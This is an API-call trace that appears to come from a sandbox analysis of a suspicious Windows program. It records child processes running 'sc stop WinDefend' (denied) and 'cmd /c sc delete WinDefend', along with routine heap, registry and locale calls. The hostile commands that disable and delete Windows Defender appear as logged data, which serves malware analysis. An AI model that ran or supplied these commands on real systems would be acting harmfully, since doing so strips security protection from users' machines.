	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0045.373] GetProcessHeap () returned 0x460000
	[0045.373] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472fd0 | out: hHeap=0x460000) returned 1
	[0045.373] GetProcessHeap () returned 0x460000
	[0045.373] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa) returned 0x46d598
	[0045.373] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0045.375] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x29f454*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc  stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f4a0 | out: lpCommandLine="sc  stop WinDefend", lpProcessInformation=0x29f4a0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xed0, dwThreadId=0xed4)) returned 1
	[0045.380] CloseHandle (hObject=0x4c) returned 1
	[0045.380] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0045.380] GetProcessHeap () returned 0x460000
	[0045.380] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x471df8 | out: hHeap=0x460000) returned 1
	[0045.380] GetEnvironmentStringsW () returned 0x471df8*
	[0045.380] GetProcessHeap () returned 0x460000
	[0045.380] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x97a) returned 0x470450
	[0045.380] FreeEnvironmentStringsW (penv=0x471df8) returned 1
	[0045.380] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0045.418] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x29f394 | out: lpExitCode=0x29f394*=0x5) returned 1
	[0045.418] CloseHandle (hObject=0x50) returned 1
	[0045.419] _vsnwprintf (in: _Buffer=0x29f4dc, _BufferCount=0x13, _Format="%08X", _ArgList=0x29f3a0 | out: _Buffer="00000005") returned 8
	[0045.419] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1
	[0045.419] GetProcessHeap () returned 0x460000
	[0045.419] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470450 | out: hHeap=0x460000) returned 1
	[0045.419] GetEnvironmentStringsW () returned 0x473020*
	[0045.419] GetProcessHeap () returned 0x460000
	[0045.419] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x9a0) returned 0x470450
	[0045.419] FreeEnvironmentStringsW (penv=0x473020) returned 1
	[0045.419] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0045.419] GetProcessHeap () returned 0x460000
	[0045.419] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470450 | out: hHeap=0x460000) returned 1
	[0045.419] GetEnvironmentStringsW () returned 0x473020*
	[0045.419] GetProcessHeap () returned 0x460000
	[0045.419] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x9a0) returned 0x470450
	[0045.419] FreeEnvironmentStringsW (penv=0x473020) returned 1
	[0045.419] GetProcessHeap () returned 0x460000
	[0045.419] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46d598 | out: hHeap=0x460000) returned 1
	[0045.419] DeleteProcThreadAttributeList (in: lpAttributeList=0x29f3f8 | out: lpAttributeList=0x29f3f8) 
	[0045.419] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.419] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0045.419] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d841ac | out: lpMode=0x49d841ac) returned 1
	[0045.419] _get_osfhandle (_FileHandle=0) returned 0x3
	[0045.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d841b0 | out: lpMode=0x49d841b0) returned 1
	[0045.420] SetConsoleInputExeNameW () returned 0x1
	[0045.420] GetConsoleOutputCP () returned 0x1b5
	[0045.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d84260 | out: lpCPInfo=0x49d84260) returned 1
	[0045.420] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0045.420] exit (_Code=5) 

Process:
	id = "9"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee176c0"
	os_pid = "0xed0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0xeb8"
	cmd_line = "sc  stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 25
	os_tid = 0xed4

	[0045.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafb24 | out: lpSystemTimeAsFileTime=0xafb24*(dwLowDateTime=0x6e936c0, dwHighDateTime=0x1d50a6a)) 
	[0045.403] GetCurrentProcessId () returned 0xed0
	[0045.403] GetCurrentThreadId () returned 0xed4
	[0045.403] GetTickCount () returned 0xa6433a
	[0045.403] QueryPerformanceCounter (in: lpPerformanceCount=0xafb1c | out: lpPerformanceCount=0xafb1c*=11924134033) returned 1
	[0045.404] GetModuleHandleA (lpModuleName=0x0) returned 0xc50000
	[0045.404] __set_app_type (_Type=0x1) 
	[0045.404] __p__fmode () returned 0x770231f4
	[0045.404] __p__commode () returned 0x770231fc
	[0045.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc579c7) returned 0x0
	[0045.404] __wgetmainargs (in: _Argc=0xc59020, _Argv=0xc59028, _Env=0xc59024, _DoWildCard=0, _StartInfo=0xc59034 | out: _Argc=0xc59020, _Argv=0xc59028, _Env=0xc59024) returned 0
	[0045.404] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0045.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0045.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0045.406] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23
	[0045.406] _wcsicmp (_String1="stop", _String2="query") returned 2
	[0045.406] _wcsicmp (_String1="stop", _String2="queryex") returned 2
	[0045.406] _wcsicmp (_String1="stop", _String2="start") returned 14
	[0045.406] _wcsicmp (_String1="stop", _String2="pause") returned 3
	[0045.406] _wcsicmp (_String1="stop", _String2="interrogate") returned 10
	[0045.406] _wcsicmp (_String1="stop", _String2="control") returned 16
	[0045.406] _wcsicmp (_String1="stop", _String2="continue") returned 16
	[0045.406] _wcsicmp (_String1="stop", _String2="stop") returned 0
	[0045.406] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1ef0f8
	[0045.409] OpenServiceW (hSCManager=0x1ef0f8, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x0
	[0045.410] GetLastError () returned 0x5
	[0045.410] _itow (in: _Dest=0x5, _Radix=719292 | out: _Dest=0x5) returned="5"
	[0045.410] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0xc59380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13
	[0045.411] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xaf9a4, nSize=0x2, Arguments=0xaf9b0 | out: lpBuffer="ର\x1f\x01") returned 0x33
	[0045.412] GetFileType (hFile=0x7) returned 0x2
	[0045.412] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xaf978 | out: lpMode=0xaf978) returned 1
	[0045.412] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1f0b30*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0xaf994, lpReserved=0x0 | out: lpBuffer=0x1f0b30*, lpNumberOfCharsWritten=0xaf994*=0x33) returned 1
	[0045.413] LocalFree (hMem=0x1f0b30) returned 0x0
	[0045.413] LocalFree (hMem=0x0) returned 0x0
	[0045.413] CloseServiceHandle (hSCObject=0x1ef0f8) returned 1
	[0045.414] exit (_Code=5) 

Thread:
	id = 26
	os_tid = 0xed8


Process:
	id = "10"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee176c0"
	os_pid = "0xedc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "/c sc delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 27
	os_tid = 0xee0

	[0046.770] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb94 | out: lpSystemTimeAsFileTime=0x1afb94*(dwLowDateTime=0x7baafc0, dwHighDateTime=0x1d50a6a)) 
	[0046.770] GetCurrentProcessId () returned 0xedc
	[0046.771] GetCurrentThreadId () returned 0xee0
	[0046.771] GetTickCount () returned 0xa64897
	[0046.771] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb8c | out: lpPerformanceCount=0x1afb8c*=12060860401) returned 1
	[0046.771] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000
	[0046.771] __set_app_type (_Type=0x1) 
	[0046.771] __p__fmode () returned 0x770231f4
	[0046.772] __p__commode () returned 0x770231fc
	[0046.772] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0
	[0046.772] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0
	[0046.772] GetCurrentThreadId () returned 0xee0
	[0046.772] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xee0) returned 0x38
	[0046.772] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0046.772] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0046.772] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0046.772] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0046.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afb24 | out: phkResult=0x1afb24*=0x0) returned 0x2
	[0046.773] VirtualQuery (in: lpAddress=0x1afb5b, lpBuffer=0x1afaf4, dwLength=0x1c | out: lpBuffer=0x1afaf4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0046.773] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afaf4, dwLength=0x1c | out: lpBuffer=0x1afaf4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0046.773] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afaf4, dwLength=0x1c | out: lpBuffer=0x1afaf4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0046.773] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afaf4, dwLength=0x1c | out: lpBuffer=0x1afaf4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0046.773] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afaf4, dwLength=0x1c | out: lpBuffer=0x1afaf4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0046.773] GetConsoleOutputCP () returned 0x1b5
	[0046.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0046.773] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1
	[0046.773] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0046.773] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0046.773] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.774] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0046.774] _get_osfhandle (_FileHandle=0) returned 0x3
	[0046.774] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0046.774] _get_osfhandle (_FileHandle=0) returned 0x3
	[0046.774] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0046.774] GetEnvironmentStringsW () returned 0x280238*
	[0046.774] GetProcessHeap () returned 0x270000
	[0046.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x932) returned 0x280b78
	[0046.774] FreeEnvironmentStringsW (penv=0x280238) returned 1
	[0046.775] GetProcessHeap () returned 0x270000
	[0046.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4) returned 0x27fb38
	[0046.775] GetEnvironmentStringsW () returned 0x280238*
	[0046.775] GetProcessHeap () returned 0x270000
	[0046.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x932) returned 0x2814b8
	[0046.775] FreeEnvironmentStringsW (penv=0x280238) returned 1
	[0046.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea94 | out: phkResult=0x1aea94*=0x40) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0xc8, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x1, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0x1, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x0, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x40, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x40, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0x40, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.775] RegCloseKey (hKey=0x40) returned 0x0
	[0046.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea94 | out: phkResult=0x1aea94*=0x40) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0x40, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x1, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0x1, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.776] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x0, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.776] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x9, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.776] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x4, lpData=0x1aeaa0*=0x9, lpcbData=0x1aea98*=0x4) returned 0x0
	[0046.776] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea9c, lpData=0x1aeaa0, lpcbData=0x1aea98*=0x1000 | out: lpType=0x1aea9c*=0x0, lpData=0x1aeaa0*=0x9, lpcbData=0x1aea98*=0x1000) returned 0x2
	[0046.776] RegCloseKey (hKey=0x40) returned 0x0
	[0046.776] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf32
	[0046.776] srand (_Seed=0x5cdadf32) 
	[0046.776] GetCommandLineW () returned="/c sc delete WinDefend"
	[0046.776] GetCommandLineW () returned="/c sc delete WinDefend"
	[0046.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.776] GetProcessHeap () returned 0x270000
	[0046.776] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x210) returned 0x280238
	[0046.776] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x280240, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0046.777] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0046.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0046.777] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0046.777] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0046.777] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0046.777] GetProcessHeap () returned 0x270000
	[0046.777] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x280b78 | out: hHeap=0x270000) returned 1
	[0046.777] GetEnvironmentStringsW () returned 0x280450*
	[0046.777] GetProcessHeap () returned 0x270000
	[0046.777] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x94a) returned 0x282750
	[0046.777] FreeEnvironmentStringsW (penv=0x280450) returned 1
	[0046.777] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.777] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0046.778] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0046.778] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0046.778] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0046.778] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0046.778] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0046.778] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0046.778] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0046.778] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0046.778] GetProcessHeap () returned 0x270000
	[0046.778] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x2800b8
	[0046.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af860 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1af860, lpFilePart=0x1af85c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1af85c*="system32") returned 0x13
	[0046.778] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0046.778] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1af5dc | out: lpFindFileData=0x1af5dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x2707f0
	[0046.778] FindClose (in: hFindFile=0x2707f0 | out: hFindFile=0x2707f0) returned 1
	[0046.778] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1af5dc | out: lpFindFileData=0x1af5dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x2707f0
	[0046.778] FindClose (in: hFindFile=0x2707f0 | out: hFindFile=0x2707f0) returned 1
	[0046.778] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0046.779] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0046.779] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x282750 | out: hHeap=0x270000) returned 1
	[0046.779] GetEnvironmentStringsW () returned 0x280450*
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x97a) returned 0x281df8
	[0046.779] FreeEnvironmentStringsW (penv=0x280450) returned 1
	[0046.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2800b8 | out: hHeap=0x270000) returned 1
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x400e) returned 0x283a30
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x34) returned 0x2800b8
	[0046.779] GetProcessHeap () returned 0x270000
	[0046.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283a30 | out: hHeap=0x270000) returned 1
	[0046.779] GetConsoleOutputCP () returned 0x1b5
	[0046.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0046.780] GetUserDefaultLCID () returned 0x409
	[0046.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2
	[0046.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af9a0, cchData=128 | out: lpLCData="0") returned 2
	[0046.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af9a0, cchData=128 | out: lpLCData="0") returned 2
	[0046.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af9a0, cchData=128 | out: lpLCData="1") returned 2
	[0046.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4
